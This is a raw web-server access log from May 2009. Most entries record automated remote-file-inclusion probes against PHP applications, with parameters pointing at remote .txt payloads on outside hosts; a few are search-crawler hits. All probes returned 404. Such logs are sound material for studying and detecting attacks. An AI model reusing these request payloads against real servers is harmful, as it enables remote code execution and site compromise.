209.200.8.89 - - [20/May/2009:05:15:31 -0400] "GET /logs/access_log.Q108120300%20%20//components/com_peoplebook/param.peoplebook.php=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 312 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:05:15:32 -0400] "GET /logs/access_log.Q108111700%20%20//components/com_peoplebook/param.peoplebook.php=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 312 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:05:15:38 -0400] "GET /logs/access_log.Q108111700%20%20//components/com_peoplebook/param.peoplebook.php=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 312 "-" "Mozilla/5.0"
123.125.64.49 - - [20/May/2009:05:15:53 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.175.180.194 - - [20/May/2009:05:16:10 -0400] "GET /logs/access_log.Q108082200%20%20/errors.php?error=http://www.wizard.com.br/fx29id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.125.64.51 - - [20/May/2009:05:16:20 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.200.8.89 - - [20/May/2009:05:16:30 -0400] "GET /logs/access_log.Q108120300//components/com_peoplebook/param.peoplebook.php=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 310 "-" "Mozilla/5.0"
200.32.100.130 - - [20/May/2009:05:16:57 -0400] "GET /logs/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
200.32.100.130 - - [20/May/2009:05:16:57 -0400] "GET /nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
124.217.216.86 - - [20/May/2009:05:17:05 -0400] "GET /logs/error_log.Q109050400//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://sherif-dudulz.ucoz.com/id.txt? HTTP/1.1" 404 258 "-" "libwww-perl/5.826"
91.206.183.148 - - [20/May/2009:05:17:41 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
91.206.183.148 - - [20/May/2009:05:17:41 -0400] "GET /logs/access_log.Q108082200//index.php?DOCUMENT_ROOT=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
